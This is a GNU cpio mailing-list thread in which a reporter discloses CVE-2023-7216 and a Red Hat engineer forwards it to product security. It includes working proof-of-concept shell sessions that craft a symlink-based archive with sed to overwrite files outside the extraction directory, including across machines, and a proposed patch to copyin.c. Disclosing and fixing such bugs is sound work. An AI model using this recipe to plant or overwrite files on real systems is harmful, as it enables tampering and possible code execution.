Re: Is there a fix for this CVE-2023-7216?

[Nick Tait (he / him)]

Hello Peng,

Thank you for the detailed report! This information needs to get to
secal...@redhat.com, and I am including that email address now. In future
please use that account as a way to get in contact with Red Hat Product
Security. 💜

~Nick Tait
Senior Product Security Engineer

On Thu, Feb 29, 2024 at 6:37 AM Peng <2773414...@qq.com> wrote:

> Dear cpio maintainer:
>
>     This is a Red Hat Community Report on CVE-2023-7216:
> https://bugzilla.redhat.com/show_bug.cgi?id=2249901
>
>     CVE-2023-7216 can cause path traversal when opening a cpio archive,
> which can lead to malicious file overwrites of arbitrary directories.
>
>     Redhat CVE-2023-7216's Poc can be reproduced using the following
> method:
>     ```
>     [root@localhost home]# mkdir testcpio
>     [root@localhost home]# ln -sf /tmp/ testcpio/tmp
>     [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
>     [root@localhost home]# cd  testcpio/
>     [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
>     tmp
>     tmpYtrav.txt
>     1 block
>     [root@localhost testcpio]# cd ..
>     [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
>     [root@localhost home]# cpio -i < trav.cpio
>     [root@localhost home]# cat /tmp/trav.txt
>     TEST Traversal
>     [root@localhost home]# cat tmp/trav.txt
>     TEST Traversal
>     ```
>     Based on my understanding of the POC and analysis of CVE-2023-7216, I
> constructed two more POC scenarios.
>
>     The POC1 can be reproduced using the following methods:
>         Machine A can use the tampered trav.cpio file to overwrite any
> file on machine B, which may lead to remote command execution.
>         ``` Machine A
>         [root@localhostA home]# mkdir testcpio
>         [root@localhostA home]# ln -sf /tmp/ testcpio/tmp
>         [root@localhostA home]# echo "TEST Traversal" >
> testcpio/tmpYtrav.txt
>         [root@localhostA home]# cd  testcpio/
>         [root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
>         tmp
>         tmpYtrav.txt
>         1 block
>         [root@localhost testcpio]# cd ..
>         [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
>         ```
>         Assume that machine A transfers files to machine B through scp or
> other file transfer methods. CVE-2023-7216 is triggered when Machine B
> opens trav.cpio
>         ```Machine B
>         [root@localhostB home]# cpio -i < trav.cpio
>         [root@localhostB home]# cat /tmp/trav.txt
>         TEST Traversal
>         [root@localhostB home]# cat tmp/trav.txt
>         TEST Traversal
>         ```
>     Impact of POC1: This indicates that any cpio archive file that
> contains symlinks may cause security risks such as path traversal.
>
>
>     The POC2 can be reproduced using the following methods:
>         ```
>         [root@localhost home]# mkdir testcpio
>         [root@localhost home]# ln -sf /tmp/ testcpio/tmp
>         [root@localhost home]# echo "TEST Traversal" >
> testcpio/tmpYtrav.txt
>         [root@localhost home]# cd  testcpio/
>         [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
>         tmp
>         tmpYtrav.txt
>         1 block
>         [root@localhost testcpio]# cd ..
>         [root@localhost home]# mkdir dirA
>         [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
>         [root@localhost home]# cpio -i < trav.cpio -D /home/dirA
>         [root@localhost home]# cat /tmp/trav.txt
>         TEST Traversal
>         [root@localhost home]# cat dirA/tmp/trav.txt
>         TEST Traversal
>         ```
>
>     Impact of POC2: When the -D option is used, the cpio file is expected
> to be decompressed in the specified directory. However, due to the impact
> of CVE-2023-7216, the file is also generated in the symlink directory,
> which is not as expected.Like CVE-2015-1197. When the
> --no-absolute-filenames option is used, the decompressed file should be
> generated in the current directory instead of the symlink directory.
>     First of all, I would like to discuss an issue with you, that is, when
> fixing CVE-2015-1197, the copy_link () function generates symlinks directly
> through the symlink () function if the --no-absolute-filenames option is
> not used when processing symlinks. This means that in this case, cpio
> allows writing files in arbitrary directories through symlinks. Is this
> what cpio was designed for?
>     I believe this design is the root cause of CVE-2023-7216. If you think
> this is a reasonable design, please let me know your reasons and provide a
> solution for CVE-2023-7216.
>     If you agree with me that cpio should not allow writing files in
> arbitrary directories through symlinks,then we can discuss my solution.
>     In my views, I don't think we can guarantee that the cpio archive does
> not contain any symlinks. We must handle each symlink as the same as the
> fix for CVE-2015-1197 during decompression. So I made a patch. I have
> attached the patch in the mail. If you have a better fix, please let me
> know.
>
>     Look forward to your feedback and suggestions soon.
>
> Best Regards,
> Peng
>
> From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
> From: Peng <2773414...@qq.com>
> Date: Thu, 29 Feb 2024 17:22:11 +0800
> Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal
>
> ---
>  src/copyin.c | 26 +-------------------------
>  1 file changed, 1 insertion(+), 25 deletions(-)
>
> diff --git a/src/copyin.c b/src/copyin.c
> index ace0a02..c454313 100644
> --- a/src/copyin.c
> +++ b/src/copyin.c
> @@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int 
> in_file_des)
>        link_name = xstrdup (file_hdr->c_tar_linkname);
>      }
>
> -  if (no_abs_paths_flag)
> -    symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
> -  else
> -    {
> -      res = UMASKED_SYMLINK (link_name, file_hdr->c_name,
> -                          file_hdr->c_mode);
> -      if (res < 0 && create_dir_flag)
> -     {
> -       create_all_directories (file_hdr->c_name);
> -       res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode);
> -     }
> -      if (res < 0)
> -     symlink_error (link_name, file_hdr->c_name);
> -      else if (!no_chown_flag)
> -     {
> -       uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid;
> -       gid_t gid = set_group_flag ? set_group : file_hdr->c_gid;
> -       if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM)
> -         chown_error_details (file_hdr->c_name, uid, gid);
> -     }
> -
> -      if (retain_time_flag)
> -     set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime,
> -                     file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW);
> -    }
> +  symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
>    free (link_name);
>  }
>  
> --
> 2.33.0
>
>
>
> ------------------ Original ------------------
> *From:* "Peng" <2773414...@qq.com>;
> *Date:* Thu, Feb 29, 2024 07:02 PM
> *To:* "bug-cpio"<bug-cpio@gnu.org>;"ntait"<nt...@redhat.com>;"gray"<
> g...@gnu.org.ua>;"mrehak"<mre...@redhat.com>;
> *Subject:* Re:Is there a fix for this CVE-2023-7216?
>
> Dear cpio maintainer:
>                       This is a Red Hat Community Report on 
> CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901
>               CVE-2023-7216 can cause path traversal when opening a cpio 
> archive, which can lead to malicious file overwrites of arbitrary directories.
>               Redhat CVE-2023-7216's Poc can be reproduced using the 
> following method:
>       ```
>       [root@localhost home]# mkdir testcpio
>       [root@localhost home]# ln -sf /tmp/ testcpio/tmp
>       [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
>       [root@localhost home]# cd  testcpio/
>       [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
>       tmp
>       tmpYtrav.txt
>       1 block
>       [root@localhost testcpio]# cd ..
>       [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
>       [root@localhost home]# cpio -i < trav.cpio
>       [root@localhost home]# cat /tmp/trav.txt
>       TEST Traversal
>       [root@localhost home]# cat tmp/trav.txt
>       TEST Traversal
>       ```
>       First of all, I would like to confirm with you, do you accept 
> CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio 
> software?
>       If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if 
> there is a better fix, please point it out.
>               CVE-2023-7216 is similar to CVE-2015-1197,Both of them use 
> symlink to cause Path Traversal.The CVE-2015-1197 fix uses 
> symlink_placeholder () to fix a Path Traversal issue in the 
> --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path 
> traversal also exists in other scenarios.
>               So I made a patch to fix CVE-2023-7216, copyin_link() should 
> enable symlink_placeholder() by default, not only when the 
> --no-absolute-filenames option is on.
>               Look forward to your feedback and suggestions soon.
>       Best Regards,
> Peng
>
>
>
> ------------------ Original ------------------
> *From:* "2773414454" <2773414...@qq.com>;
> *Date:* Tue, Feb 20, 2024 11:03 AM
> *To:* "bug-cpio"<bug-cpio@gnu.org>;
> *Subject:* Is there a fix for this CVE-2023-7216?
>
> Dear cpio maintainer:
>
>     https://nvd.nist.gov/vuln/detail/CVE-2023-7216
>     NVD does not provide any related patch information.
>     Is there a fix for cpio's CVE-2023-7216?
>       [1] If not, what is the repair plan for cpio?
>       [2] If yes, can you indicate which submissions fix CVE-2023-7216?
>
> peng
>
>
>
>